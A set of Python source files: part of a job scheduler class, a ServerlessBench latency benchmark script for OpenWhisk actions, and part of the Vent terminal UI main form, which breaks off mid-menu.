"""
Removes a job, preventing it from being run any more.
"""
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
if job in list(jobstore.jobs):
self._remove_job(job, alias, jobstore)
return
finally:
self._jobstores_lock.release()
raise KeyError('Job "%s" is not scheduled in any job store' % job)
def unschedule_func(self, func):
"""
Removes all jobs that would execute the given function.
"""
found = False
self._jobstores_lock.acquire()
try:
for alias, jobstore in iteritems(self._jobstores):
for job in list(jobstore.jobs):
if job.func == func:
self._remove_job(job, alias, jobstore)
found = True
finally:
self._jobstores_lock.release()
if not found:
raise KeyError('The given function is not scheduled in this '
'scheduler')
def print_jobs(self, out=None):
    """
    Prints out a textual listing of all jobs currently scheduled on this
    scheduler.

    :param out: a file-like object to print to (defaults to **sys.stdout**
        if nothing is given)
    """
    target = out if out else sys.stdout
    lines = []
    self._jobstores_lock.acquire()
    try:
        for alias, store in iteritems(self._jobstores):
            lines.append('Jobstore %s:' % alias)
            if not store.jobs:
                lines.append(' No scheduled jobs')
            else:
                for job in store.jobs:
                    lines.append(' %s' % job)
    finally:
        self._jobstores_lock.release()
    target.write(os.linesep.join(lines) + os.linesep)
def _run_job(self, job, run_times):
    """
    Acts as a harness that runs the actual job code in a thread.

    :param job: the job whose callable is executed
    :param run_times: scheduled datetimes for this job; each entry is
        either executed or reported to listeners as a misfire
    """
    for run_time in run_times:
        # See if the job missed its run time window, and handle possible
        # misfires accordingly
        difference = datetime.now() - run_time
        grace_time = timedelta(seconds=job.misfire_grace_time)
        if difference > grace_time:
            # Notify listeners about a missed run
            event = JobEvent(EVENT_JOB_MISSED, job, run_time)
            self._notify_listeners(event)
            logger.warning('Run time of job "%s" was missed by %s',
                           job, difference)
        else:
            try:
                # Reserve a concurrency slot; raises once the job already
                # has job.max_instances copies running
                job.add_instance()
            except MaxInstancesReachedError:
                event = JobEvent(EVENT_JOB_MISSED, job, run_time)
                self._notify_listeners(event)
                logger.warning('Execution of job "%s" skipped: '
                               'maximum number of running instances '
                               'reached (%d)', job, job.max_instances)
                break
            logger.info('Running job "%s" (scheduled at %s)', job,
                        run_time)
            try:
                retval = job.func(*job.args, **job.kwargs)
            except:
                # Notify listeners about the exception
                # (bare except: every failure from user job code is
                # logged and turned into an event instead of propagating)
                exc, tb = sys.exc_info()[1:]
                event = JobEvent(EVENT_JOB_ERROR, job, run_time,
                                 exception=exc, traceback=tb)
                self._notify_listeners(event)
                logger.exception('Job "%s" raised an exception', job)
            else:
                # Notify listeners about successful execution
                event = JobEvent(EVENT_JOB_EXECUTED, job, run_time,
                                 retval=retval)
                self._notify_listeners(event)
                logger.info('Job "%s" executed successfully', job)
            job.remove_instance()  # release the concurrency slot
            # If coalescing is enabled, don't attempt any further runs
            if job.coalesce:
                break
def _process_jobs(self, now):
    """
    Iterates through jobs in every jobstore, starts pending jobs
    and figures out the next wakeup time.

    :param now: datetime against which due run times are computed
    :return: earliest ``next_run_time`` across all jobs, or ``None``
        when nothing is scheduled
    """
    next_wakeup_time = None
    self._jobstores_lock.acquire()
    try:
        for alias, jobstore in iteritems(self._jobstores):
            # iterate a snapshot: _remove_job below mutates jobstore.jobs
            for job in tuple(jobstore.jobs):
                run_times = job.get_run_times(now)
                if run_times:
                    self._threadpool.submit(self._run_job, job, run_times)
                    # Increase the job's run count
                    if job.coalesce:
                        job.runs += 1
                    else:
                        job.runs += len(run_times)
                # Update the job, but don't keep finished jobs around
                if job.compute_next_run_time(
                        now + timedelta(microseconds=1)):
                    jobstore.update_job(job)
                else:
                    self._remove_job(job, alias, jobstore)
                # track the minimum next run time over all surviving jobs
                if not next_wakeup_time:
                    next_wakeup_time = job.next_run_time
                elif job.next_run_time:
                    next_wakeup_time = min(next_wakeup_time,
                                           job.next_run_time)
        return next_wakeup_time
    finally:
        self._jobstores_lock.release()
def _main_loop(self):
    """Executes jobs on schedule.

    Loops until ``self._stopped`` becomes true; each pass processes due
    jobs and then sleeps on the ``self._wakeup`` event until the next
    run time, a new job is added, or the scheduler is stopped.
    """
    logger.info('Scheduler started')
    self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_START))
    self._wakeup.clear()
    while not self._stopped:
        logger.debug('Looking for jobs to run')
        now = datetime.now()
        next_wakeup_time = self._process_jobs(now)
        # Sleep until the next job is scheduled to be run,
        # a new job is added or the scheduler is stopped
        if next_wakeup_time is not None:
            wait_seconds = time_difference(next_wakeup_time, now)
            logger.debug('Next wakeup is due at %s (in %f seconds)',
                         next_wakeup_time, wait_seconds)
            try:
                self._wakeup.wait(wait_seconds)
            except IOError:  # Catch errno 514 on some Linux kernels
                pass
            self._wakeup.clear()
        elif self.standalone:
            # standalone mode with nothing left to run: stop entirely
            logger.debug('No jobs left; shutting down scheduler')
            self.shutdown()
            break
        else:
            # block indefinitely until add_*_job sets the wakeup event
            logger.debug('No jobs; waiting until a job is added')
            try:
                self._wakeup.wait()
            except IOError:  # Catch errno 514 on some Linux kernels
                pass
            self._wakeup.clear()
    logger.info('Scheduler has been shut down')
    self._notify_listeners(SchedulerEvent(EVENT_SCHEDULER_SHUTDOWN))
|
run.py |
# Copyright (c) 2020 Institution of Parallel and Distributed System, Shanghai Jiao Tong University
# ServerlessBench is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
import os
import threading
import time
import sys, getopt
def client(i, results, loopTimes):
    """Run the benchmark script ``loopTimes`` times and store its
    stdout in ``results[i]``."""
    print("client %d start" % i)
    output = os.popen("./single-cold_warm.sh -R -t " + str(loopTimes)).read()
    results[i] = output
    print("client %d finished" % i)
def warmup(i, warmupTimes, actionName, params):
    """Invoke the action ``warmupTimes`` times (blocking) so its
    containers are warm before measurement starts."""
    cmd = "wsk -i action invoke %s %s --result --blocking" % (actionName, params)
    for _ in range(warmupTimes):
        # output is drained and discarded; only the invocation matters
        os.popen(cmd).read()
    print("client %d warmup finished" % i)
def main():
    """Drive the benchmark.

    Warm the action with ``warmupTimes`` blocking invocations per client,
    then fan out ``clientNum`` concurrent clients for ``loopTimes``
    iterations each, write per-request timestamps to ``result.csv`` and
    summarize via ``formatResult``.
    """
    clientNum, loopTimes, warmupTimes = getargv()
    containerName = "hellopython"
    actionName = "hello-python"
    params = ""

    # Stop running containers of the action so first invocations are cold.
    r = os.popen("docker stop `docker ps | grep %s | awk {'print $1'}`" % containerName)
    r.read()

    # First: warm up
    threads = [threading.Thread(target=warmup,
                                args=(i, warmupTimes, actionName, params))
               for i in range(clientNum)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("Warm up complete")

    # Second: invoke the actions, one client per thread.
    results = [''] * clientNum
    threads = [threading.Thread(target=client, args=(i, results, loopTimes))
               for i in range(clientNum)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    latencies = []
    minInvokeTime = 0x7fffffffffffffff
    maxEndTime = 0
    # Context manager closes result.csv deterministically (the original
    # leaked the handle).
    with open("result.csv", "w") as outfile:
        outfile.write("invokeTime,startTime,endTime\n")
        for i in range(clientNum):
            # get and parse the result of a client
            for times in parseResult(results[i]):
                outfile.write(times[0] + ',' + times[1] + ',' + times[2] + '\n')
                # Collect the latency
                latencies.append(int(times[-1]) - int(times[0]))
                # Track the first invoked action and the last returned one.
                minInvokeTime = min(minInvokeTime, int(times[0]))
                maxEndTime = max(maxEndTime, int(times[-1]))
    formatResult(latencies, maxEndTime - minInvokeTime, clientNum,
                 loopTimes, warmupTimes)
def parseResult(result):
    """Extract (invokeTime, startTime, endTime) triples from client output.

    Each line containing the marker "invokeTime" is scanned for up to
    three 13-digit (millisecond epoch) timestamps; missing timestamps
    are left as empty strings.

    Bug fix: the original looped ``while count < 3`` around the scan, so
    a marker line with fewer than three numbers hung forever, and a
    fourth digit run raised IndexError. The scan is now bounded by both
    the line length and the three expected fields.
    """
    parsedResults = []
    for line in result.split('\n'):
        if line.find("invokeTime") == -1:
            continue
        parsedTimes = ['', '', '']
        i = 0
        count = 0
        # single bounded scan: stop at end of line or after 3 timestamps
        while i < len(line) and count < 3:
            if line[i].isdigit():
                parsedTimes[count] = line[i:i + 13]
                i += 13
                count += 1
            else:
                i += 1
        parsedResults.append(parsedTimes)
    return parsedResults
def getargv():
    """Parse sys.argv into (client number, loop times, warm up times).

    Warm up times defaults to 1 when the optional third argument is
    omitted. Prints usage and exits on any invalid input.
    """
    usage = "Usage: python3 run.py <client number> <loop times> [<warm up times>]"
    argc = len(sys.argv)
    if argc != 3 and argc != 4:
        print(usage)
        exit(0)
    clients, loops = sys.argv[1], sys.argv[2]
    if not clients.isdigit() or not loops.isdigit() \
            or int(clients) < 1 or int(loops) < 1:
        print(usage)
        print("Client number and loop times must be an positive integer")
        exit(0)
    if argc == 4:
        warm = sys.argv[3]
        if not warm.isdigit() or int(warm) < 1:
            print(usage)
            print("Warm up times must be an positive integer")
            exit(0)
        return (int(clients), int(loops), int(warm))
    return (int(clients), int(loops), 1)
def formatResult(latencies, duration, client, loop, warmup):
    """Print a latency/throughput summary and append it to eval-result.log.

    :param latencies: per-request latencies in ms (sorted in place here)
    :param duration: wall-clock span of the whole run, in ms
    :param client: number of concurrent clients (echoed into the log)
    :param loop: loop count per client (echoed into the log)
    :param warmup: warm-up count (echoed into the log)
    """
    requestNum = len(latencies)
    latencies.sort()
    duration = float(duration)
    # calculate the average latency
    total = sum(latencies)
    print("\n")
    print("------------------ result ---------------------")
    averageLatency = float(total) / requestNum
    # percentile = value at ceil-ish index; matches the original's math
    _50pcLatency = latencies[int(requestNum * 0.5) - 1]
    _75pcLatency = latencies[int(requestNum * 0.75) - 1]
    _90pcLatency = latencies[int(requestNum * 0.9) - 1]
    _95pcLatency = latencies[int(requestNum * 0.95) - 1]
    _99pcLatency = latencies[int(requestNum * 0.99) - 1]
    print("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%")
    print("%.2f\t%d\t%d\t%d\t%d\t%d" % (averageLatency, _50pcLatency, _75pcLatency, _90pcLatency, _95pcLatency, _99pcLatency))
    print("throughput (n/s):\n%.2f" % (requestNum / (duration / 1000)))
    # output result to file; context manager closes the handle
    # (the original leaked it)
    with open("eval-result.log", "a") as resultfile:
        resultfile.write("\n\n------------------ (concurrent)result ---------------------\n")
        resultfile.write("client: %d, loop_times: %d, warmup_times: %d\n" % (client, loop, warmup))
        resultfile.write("%d requests finished in %.2f seconds\n" % (requestNum, (duration / 1000)))
        resultfile.write("latency (ms):\navg\t50%\t75%\t90%\t95%\t99%\n")
        resultfile.write("%.2f\t%d\t%d\t%d\t%d\t%d\n" % (averageLatency, _50pcLatency, _75pcLatency, _90pcLatency, _95pcLatency, _99pcLatency))
        resultfile.write("throughput (n/s):\n%.2f\n" % (requestNum / (duration / 1000)))
main() |
main.py | import npyscreen
import os
import re
import sys
import time
from docker.errors import DockerException
from npyscreen import notify_confirm
from threading import Thread
from vent.api.actions import Action
from vent.api.menu_helpers import MenuHelper
from vent.helpers.meta import Containers
from vent.helpers.meta import Cpu
from vent.helpers.meta import DropLocation
from vent.helpers.meta import Gpu
from vent.helpers.meta import Images
from vent.helpers.meta import Jobs
from vent.helpers.meta import Timestamp
from vent.helpers.meta import Uptime
from vent.helpers.logs import Logger
from vent.helpers.paths import PathDirs
from vent.menus.add import AddForm
from vent.menus.ntap import CreateNTap
from vent.menus.ntap import DeleteNTap
from vent.menus.ntap import ListNTap
from vent.menus.ntap import NICsNTap
from vent.menus.ntap import StartNTap
from vent.menus.ntap import StopNTap
from vent.menus.backup import BackupForm
from vent.menus.editor import EditorForm
from vent.menus.inventory_forms import InventoryCoreToolsForm
from vent.menus.inventory_forms import InventoryToolsForm
from vent.menus.logs import LogsForm
from vent.menus.services import ServicesForm
from vent.menus.tools import ToolForm
class MainForm(npyscreen.FormBaseNewWithMenus):
""" Main information landing form for the Vent CLI """
@staticmethod
def exit(*args, **kwargs):
    """Restore the terminal state and terminate the process.

    Accepts and ignores any arguments so it can be wired directly as an
    npyscreen key handler or menu callback.
    """
    # undo whatever raw/curses mode the TUI left the terminal in
    os.system('reset')
    os.system('stty sane')
    try:
        sys.exit(0)
    except SystemExit:  # pragma: no cover
        # sys.exit always raises SystemExit, so this hard-exits the
        # process unconditionally
        os._exit(0)
@staticmethod
def t_status(core):
    """ Get status of tools for either plugins or core.

    :param core: True for core tools, False for plugin tools
    :return: (summary string,
              (running, custom_running, normal-count string, repos))
    """
    m_helper = MenuHelper()
    repos, tools = m_helper.tools_status(core)
    installed = 0
    custom_installed = 0
    built = 0
    custom_built = 0
    running = 0
    custom_running = 0
    normal = str(len(tools['normal']))
    # determine how many extra instances should be shown for running
    norm = set(tools['normal'])
    inst = set(tools['installed'])
    run_str = str(len(tools['normal']) + len(inst - norm))
    for tool in tools['running']:
        # check for multi instances too for running
        if tool in tools['normal']:
            running += 1
        elif re.sub(r'\d+$', '', tool) in tools['normal']:
            running += 1
        else:
            custom_running += 1
    for tool in tools['built']:
        if tool in tools['normal']:
            built += 1
        else:
            custom_built += 1
    for tool in tools['installed']:
        if tool in tools['normal']:
            installed += 1
        elif re.sub(r'\d+$', '', tool) not in tools['normal']:
            custom_installed += 1
    tools_str = str(running + custom_running) + "/" + run_str + " running"
    if custom_running > 0:
        tools_str += " (" + str(custom_running) + " custom)"
    tools_str += ", " + str(built + custom_built) + "/" + normal + " built"
    if custom_built > 0:
        tools_str += " (" + str(custom_built) + " custom)"
    tools_str += ", " + str(installed + custom_installed) + "/" + normal
    tools_str += " installed"
    # BUG FIX: this suffix reports custom_installed, so it must be gated
    # on custom_installed (the original checked custom_built, hiding or
    # wrongly showing the "(N custom)" installed note)
    if custom_installed > 0:
        tools_str += " (" + str(custom_installed) + " custom)"
    return tools_str, (running, custom_running, normal, repos)
def while_waiting(self):
    """ Update fields periodically if nothing is happening.

    Refreshes the date/uptime/container widgets, the core and plugin
    tool summaries, the job counters, and restarts the file_drop tool
    when its drop location changed.
    """
    # give a little extra time for file descriptors to close
    time.sleep(0.1)
    self.addfield.value = Timestamp()
    self.addfield.display()
    self.addfield2.value = Uptime()
    self.addfield2.display()
    self.addfield3.value = str(len(Containers()))+" running"
    if len(Containers()) > 0:
        self.addfield3.labelColor = "GOOD"
    else:
        self.addfield3.labelColor = "DEFAULT"
    self.addfield3.display()
    # update core tool status
    # values = (running, custom_running, normal-count string, repos)
    self.addfield5.value, values = MainForm.t_status(True)
    if values[0] + values[1] == 0:
        color = "DANGER"
        self.addfield4.labelColor = "CAUTION"
        self.addfield4.value = "Idle"
    elif values[0] >= int(values[2]):
        color = "GOOD"
        self.addfield4.labelColor = color
        self.addfield4.value = "Ready to start jobs"
    else:
        color = "CAUTION"
        self.addfield4.labelColor = color
        self.addfield4.value = "Ready to start jobs"
    self.addfield5.labelColor = color
    # update plugin tool status
    plugin_str, values = MainForm.t_status(False)
    plugin_str += ", " + str(values[3]) + " plugin(s) installed"
    self.addfield6.value = plugin_str
    # get jobs
    jobs = Jobs()
    # number of jobs, number of tool containers
    self.addfield7.value = str(jobs[0]) + " jobs running (" + str(jobs[1])
    self.addfield7.value += " tool containers), " + str(jobs[2])
    self.addfield7.value += " completed jobs"
    if jobs[0] > 0:
        self.addfield4.labelColor = "GOOD"
        self.addfield4.value = "Processing jobs"
        self.addfield7.labelColor = "GOOD"
    else:
        self.addfield7.labelColor = "DEFAULT"
    self.addfield4.display()
    self.addfield5.display()
    self.addfield6.display()
    self.addfield7.display()
    # if file drop location changes deal with it
    logger = Logger(__name__)
    status = (False, None)
    if self.file_drop.value != DropLocation()[1]:
        logger.info("Starting: file drop restart")
        try:
            self.file_drop.value = DropLocation()[1]
            logger.info("Path given: " + str(self.file_drop.value))
            # restart if the path is valid
            if DropLocation()[0]:
                status = self.api_action.clean(name='file_drop')
                status = self.api_action.prep_start(name='file_drop')
            else:
                logger.error("file drop path name invalid" +
                             DropLocation()[1])
            if status[0]:
                tool_d = status[1]
                status = self.api_action.start(tool_d)
            logger.info("Status of file drop restart: " +
                        str(status[0]))
        except Exception as e:  # pragma no cover
            logger.error("file drop restart failed with error: " + str(e))
        logger.info("Finished: file drop restart")
    self.file_drop.display()
    return
@staticmethod
def core_tools(action):
    """ Perform actions for core tools.

    Currently only ``action == 'install'`` is handled: core containers
    are installed on a worker thread while a popup streams progress.
    """
    def diff(first, second):
        """
        Get the elements that exist in the first list and not in the second
        """
        second = set(second)
        return [item for item in first if item not in second]

    def popup(original, orig_type, thr, title):
        """
        Start the thread and display a popup of info
        until the thread is finished
        """
        thr.start()
        info_str = ""
        while thr.is_alive():
            # show only what appeared since the snapshot taken before start
            if orig_type == 'containers':
                info = diff(Containers(), original)
            elif orig_type == 'images':
                info = diff(Images(), original)
            if info:
                info_str = ""
                for entry in info:
                    # TODO limit length of info_str to fit box
                    info_str += entry[0]+": "+entry[1]+"\n"
            npyscreen.notify_wait(info_str, title=title)
            time.sleep(1)
        return

    if action == 'install':
        original_images = Images()
        m_helper = MenuHelper()
        # install runs on its own thread so the popup can keep refreshing
        thr = Thread(target=m_helper.cores, args=(),
                     kwargs={"action": "install"})
        popup(original_images, "images", thr,
              'Please wait, installing core containers...')
        notify_confirm("Done installing core containers (any"
                       " already installed tools untouched).",
                       title='Installed core containers')
    return
def add_form(self, form, form_name, form_args):
    """Register *form* under *form_name* and make it the active form."""
    parent = self.parentApp
    parent.addForm(form_name, form, **form_args)
    parent.change_form(form_name)
    return
def remove_forms(self, form_names):
    """Best-effort removal of every form named in *form_names*."""
    for name in form_names:
        try:
            self.parentApp.removeForm(name)
        except Exception:  # pragma: no cover
            # form may not exist yet; ignore and continue
            pass
    return
def perform_action(self, action):
    """ Perform actions in the api from the CLI.

    Maps an action keyword (e.g. 'build', 'start_core', 'inventory')
    to the appropriate form class and form_args, then loads that form
    on a background thread while showing a loading popup.
    """
    form = ToolForm
    # 'start_core' -> 'start'; plain actions pass through unchanged
    s_action = action.split("_")[0]
    if 'core' in action:
        form_action = s_action + ' (only core tools are shown)'
        form_name = s_action.title() + " core tools"
        cores = True
    else:
        form_action = s_action + ' (only plugin tools are shown)'
        form_name = s_action.title() + " tools"
        cores = False
    a_type = 'containers'
    if s_action in ['build']:
        a_type = 'images'
    forms = [action.upper() + 'TOOLS']
    form_args = {'color': 'CONTROL',
                 'names': [s_action],
                 'name': form_name,
                 'action_dict': {'action_name': s_action,
                                 'present_t': s_action + 'ing ' + a_type,
                                 'past_t': s_action.title() + ' ' + a_type,
                                 'action': form_action,
                                 'type': a_type,
                                 'cores': cores}}
    # grammar rules
    vowels = ['a', 'e', 'i', 'o', 'u']
    # consonant-vowel-consonant ending
    # Eg: stop -> stopping
    if s_action[-1] not in vowels and \
       s_action[-2] in vowels and \
       s_action[-3] not in vowels:
        form_args['action_dict']['present_t'] = s_action + \
            s_action[-1] + 'ing ' + a_type
    # word ends with a 'e'
    # eg: remove -> removing
    if s_action[-1] == 'e':
        form_args['action_dict']['present_t'] = s_action[:-1] \
            + 'ing ' + a_type
    if s_action == 'start':
        form_args['names'].append('prep_start')
    elif s_action == 'configure':
        form_args['names'].pop()
        form_args['names'].append('get_configure')
        form_args['names'].append('save_configure')
        form_args['names'].append('restart_tools')
    # special-cased actions replace the generic ToolForm setup above
    if action == 'add':
        form = AddForm
        forms = ['ADD', 'ADDOPTIONS', 'CHOOSETOOLS']
        form_args['name'] = "Add plugins"
        form_args['name'] += "\t"*6 + "^Q to quit"
    elif action == "inventory":
        form = InventoryToolsForm
        forms = ['INVENTORY']
        form_args = {'color': "STANDOUT", 'name': "Inventory of tools"}
    elif action == 'logs':
        form = LogsForm
        forms = ['LOGS']
        form_args = {'color': "STANDOUT", 'name': "Logs"}
    elif action == 'services_core':
        form = ServicesForm
        forms = ['SERVICES']
        form_args = {'color': "STANDOUT",
                     'name': "Core Services",
                     'core': True}
    elif action == 'services':
        form = ServicesForm
        forms = ['SERVICES']
        form_args = {'color': "STANDOUT",
                     'name': "Plugin Services",
                     'core': False}
    elif action == 'services_external':
        form = ServicesForm
        forms = ['SERVICES']
        form_args = {'color': "STANDOUT",
                     'name': "External Services",
                     'core': False,
                     'external': True}
    elif action == "inventory_core":
        form = InventoryCoreToolsForm
        forms = ['COREINVENTORY']
        form_args = {'color': "STANDOUT",
                     'name': "Inventory of core tools"}
    form_args['name'] += "\t"*8 + "^T to toggle main"
    if s_action in self.view_togglable:
        form_args['name'] += "\t"*8 + "^V to toggle group view"
    try:
        self.remove_forms(forms)
        # build the form off the UI thread; show a popup meanwhile
        thr = Thread(target=self.add_form, args=(),
                     kwargs={'form': form,
                             'form_name': forms[0],
                             'form_args': form_args})
        thr.start()
        while thr.is_alive():
            npyscreen.notify('Please wait, loading form...',
                             title='Loading')
            time.sleep(1)
    except Exception as e:  # pragma: no cover
        pass
    return
def switch_tutorial(self, action):
    """ Tutorial forms.

    Dispatch table from tutorial keyword to the registered form name;
    unknown actions are a no-op, matching the original chain.
    """
    tutorial_forms = {
        'background': 'TUTORIALBACKGROUND',
        'terminology': 'TUTORIALTERMINOLOGY',
        'setup': 'TUTORIALGETTINGSETUP',
        'building_cores': 'TUTORIALBUILDINGCORES',
        'starting_cores': 'TUTORIALSTARTINGCORES',
        'adding_plugins': 'TUTORIALADDINGPLUGINS',
        'adding_files': 'TUTORIALADDINGFILES',
        'basic_troubleshooting': 'TUTORIALTROUBLESHOOTING',
    }
    if action in tutorial_forms:
        self.parentApp.change_form(tutorial_forms[action])
    return
def system_commands(self, action):
    """ Perform system commands.

    Handles backup/restore, vent configuration, factory reset, GPU
    detection, and the network-tap submenu actions ('ntapcreate',
    'ntapdelete', ...). 'swarm' and 'upgrade' are not implemented yet.
    """
    if action == 'backup':
        status = self.api_action.backup()
        if status[0]:
            notify_confirm("Vent backup successful")
        else:
            notify_confirm("Vent backup could not be completed")
    elif action == 'configure':
        form_args = {'name': 'Change vent configuration',
                     'get_configure': self.api_action.get_configure,
                     'save_configure': self.api_action.save_configure,
                     'restart_tools': self.api_action.restart_tools,
                     'vent_cfg': True}
        add_kargs = {'form': EditorForm,
                     'form_name': 'CONFIGUREVENT',
                     'form_args': form_args}
        self.add_form(**add_kargs)
    elif action == "reset":
        # destructive: requires explicit confirmation, then exits the app
        okay = npyscreen.notify_ok_cancel(
            "This factory reset will remove ALL of Vent's user data, "
            "containers, and images. Are you sure?",
            title="Confirm system command")
        if okay:
            status = self.api_action.reset()
            if status[0]:
                notify_confirm("Vent reset complete. "
                               "Press OK to exit Vent Manager console.")
            else:
                notify_confirm(status[1])
            MainForm.exit()
    elif action == "gpu":
        gpu = Gpu(pull=True)
        if gpu[0]:
            notify_confirm("GPU detection successful. "
                           "Found: " + gpu[1])
        else:
            if gpu[1] == "Unknown":
                notify_confirm("Unable to detect GPUs, try `make gpu` "
                               "from the vent repository directory. "
                               "Error: " + str(gpu[2]))
            else:
                notify_confirm("No GPUs detected.")
    elif action == 'restore':
        # offer every ~/.vent-backup* directory as a restore candidate
        backup_dir_home = os.path.expanduser('~')
        backup_dirs = [f for f in os.listdir(backup_dir_home) if
                       f.startswith('.vent-backup')]
        form_args = {'restore': self.api_action.restore,
                     'dirs': backup_dirs,
                     'name': "Pick a version to restore from" + "\t"*8 +
                             "^T to toggle main",
                     'color': 'CONTROL'}
        add_kargs = {'form': BackupForm,
                     'form_name': 'CHOOSEBACKUP',
                     'form_args': form_args}
        self.add_form(**add_kargs)
    elif action == "swarm":
        # !! TODO
        # add notify_cancel_ok popup once implemented
        pass
    elif action == "upgrade":
        # !! TODO
        # add notify_cancel_ok popup once implemented
        pass
    # deal with all network tap actions
    elif 'ntap' in action:
        # check if the tool is installed, built, and running
        output = self.api_action.tool_status_output('network_tap')
        # create a dict with substring as keys and forms as values
        ntap_form = {'create': CreateNTap,
                     'delete': DeleteNTap,
                     'list': ListNTap,
                     'nics': NICsNTap,
                     'start': StartNTap,
                     'stop': StopNTap}
        if output[0]:
            if output[1]:
                # tool not ready; show the explanation instead of a form
                notify_confirm(output[1])
            else:
                # action regarding ntap come in the form of 'ntapcreate'
                # 'ntapdelete', etc
                tap_action = action.split('ntap')[1]
                form_args = {'color': 'CONTROL',
                             'name': 'Network Tap Interface ' +
                                     tap_action + "\t"*6 +
                                     '^T to toggle main'}
                self.add_form(ntap_form[tap_action], "Network Tap " +
                              tap_action.title(), form_args)
    return
def create(self):
    """ Override method for creating FormBaseNewWithMenu form.

    Builds the whole landing screen: status widgets, the ASCII-art
    banner, and the Core Tools / Plugins / Logs / Services / System /
    Tutorials menus.
    """
    try:
        self.api_action = Action()
    except DockerException as de:  # pragma: no cover
        # Docker unreachable: report and quit rather than limp along
        notify_confirm(str(de),
                       title="Docker Error",
                       form_color='DANGER',
                       wrap=True)
        MainForm.exit()
    self.add_handlers({"^T": self.help_form, "^Q": MainForm.exit})

    # all forms that can toggle view by group
    self.view_togglable = ['inventory', 'remove', 'update', 'enable',
                           'disable', 'build']

    #######################
    # MAIN SCREEN WIDGETS #
    #######################
    self.addfield = self.add(npyscreen.TitleFixedText, name='Date:',
                             labelColor='DEFAULT', value=Timestamp())
    self.addfield2 = self.add(npyscreen.TitleFixedText, name='Uptime:',
                              labelColor='DEFAULT', value=Uptime())
    self.cpufield = self.add(npyscreen.TitleFixedText,
                             name='Logical CPUs:',
                             labelColor='DEFAULT', value=Cpu())
    self.gpufield = self.add(npyscreen.TitleFixedText, name='GPUs:',
                             labelColor='DEFAULT', value=Gpu()[1])
    self.location = self.add(npyscreen.TitleFixedText,
                             name='User Data:',
                             value=PathDirs().meta_dir,
                             labelColor='DEFAULT')
    self.file_drop = self.add(npyscreen.TitleFixedText,
                              name='File Drop:',
                              value=DropLocation()[1],
                              labelColor='DEFAULT')
    self.addfield3 = self.add(npyscreen.TitleFixedText, name='Containers:',
                              labelColor='DEFAULT',
                              value="0 "+" running")
    self.addfield4 = self.add(npyscreen.TitleFixedText, name='Status:',
                              labelColor='CAUTION',
                              value="Idle")
    self.addfield5 = self.add(npyscreen.TitleFixedText,
                              name='Core Tools:', labelColor='DANGER',
                              value="Not built")
    self.addfield6 = self.add(npyscreen.TitleFixedText,
                              name='Plugin Tools:', labelColor='DEFAULT',
                              value="Not built")
    self.addfield7 = self.add(npyscreen.TitleFixedText, name='Jobs:',
                              value="0 jobs running (0 tool containers),"
                                    " 0 completed jobs", labelColor='DEFAULT')
    # ASCII-art vent banner; NOTE(review): the literal's internal leading
    # whitespace was lost in this copy of the file — restore from upstream
    self.multifield1 = self.add(npyscreen.MultiLineEdit, max_height=22,
                                editable=False, value="""
'.,
'b *
'$ #.
$: #:
*# @):
:@,@): ,.**:'
, :@@*: ..**'
'#o. .:(@'.@*"'
'bq,..:,@@*' ,*
,p$q8,:@)' .p*'
' '@@Pp@@*'
Y7'.'
:@):.
.:@:'.
.::(@:.
_
__ _____ _ __ | |_
\\ \\ / / _ \\ '_ \\| __|
\\ V / __/ | | | |_
\\_/ \\___|_| |_|\\__|
""")

    ################
    # MENU OPTIONS #
    ################
    # Core Tools Menu Items
    self.m2 = self.add_menu(name="Core Tools", shortcut="c")
    self.m2.addItem(text='Add all latest core tools',
                    onSelect=MainForm.core_tools,
                    arguments=['install'], shortcut='i')
    self.m2.addItem(text='Build core tools',
                    onSelect=self.perform_action,
                    arguments=['build_core'], shortcut='b')
    self.m2.addItem(text='Clean core tools',
                    onSelect=self.perform_action,
                    arguments=['clean_core'], shortcut='c')
    self.m2.addItem(text='Configure core tools',
                    onSelect=self.perform_action,
                    arguments=['configure_core'], shortcut='t')
    self.m2.addItem(text='Disable core tools',
                    onSelect=self.perform_action,
                    arguments=['disable_core'], shortcut='d')
    self.m2.addItem(text='Enable core tools',
                    onSelect=self.perform_action,
                    arguments=['enable_core'], shortcut='e')
    self.m2.addItem(text='Inventory of core tools',
                    onSelect=self.perform_action,
                    arguments=['inventory_core'], shortcut='v')
    self.m2.addItem(text='Remove core tools',
                    onSelect=self.perform_action,
                    arguments=['remove_core'], shortcut='r')
    self.m2.addItem(text='Start core tools',
                    onSelect=self.perform_action,
                    arguments=['start_core'], shortcut='s')
    self.m2.addItem(text='Stop core tools',
                    onSelect=self.perform_action,
                    arguments=['stop_core'], shortcut='p')
    self.m2.addItem(text='Update core tools',
                    onSelect=self.perform_action,
                    arguments=['update_core'], shortcut='u')
    # Plugin Menu Items
    self.m3 = self.add_menu(name="Plugins", shortcut="p")
    self.m3.addItem(text='Add new plugin',
                    onSelect=self.perform_action,
                    arguments=['add'], shortcut='a')
    self.m3.addItem(text='Build plugin tools',
                    onSelect=self.perform_action,
                    arguments=['build'], shortcut='b')
    self.m3.addItem(text='Clean plugin tools',
                    onSelect=self.perform_action,
                    arguments=['clean'], shortcut='c')
    self.m3.addItem(text='Configure plugin tools',
                    onSelect=self.perform_action,
                    arguments=['configure'], shortcut='t')
    self.m3.addItem(text='Disable plugin tools',
                    onSelect=self.perform_action,
                    arguments=['disable'], shortcut='d')
    self.m3.addItem(text='Enable plugin tools',
                    onSelect=self.perform_action,
                    arguments=['enable'], shortcut='e')
    self.m3.addItem(text='Inventory of installed plugins',
                    onSelect=self.perform_action,
                    arguments=['inventory'], shortcut='i')
    self.m3.addItem(text='Remove plugins',
                    onSelect=self.perform_action,
                    arguments=['remove'], shortcut='r')
    self.m3.addItem(text='Start plugin tools',
                    onSelect=self.perform_action,
                    arguments=['start'], shortcut='s')
    self.m3.addItem(text='Stop plugin tools',
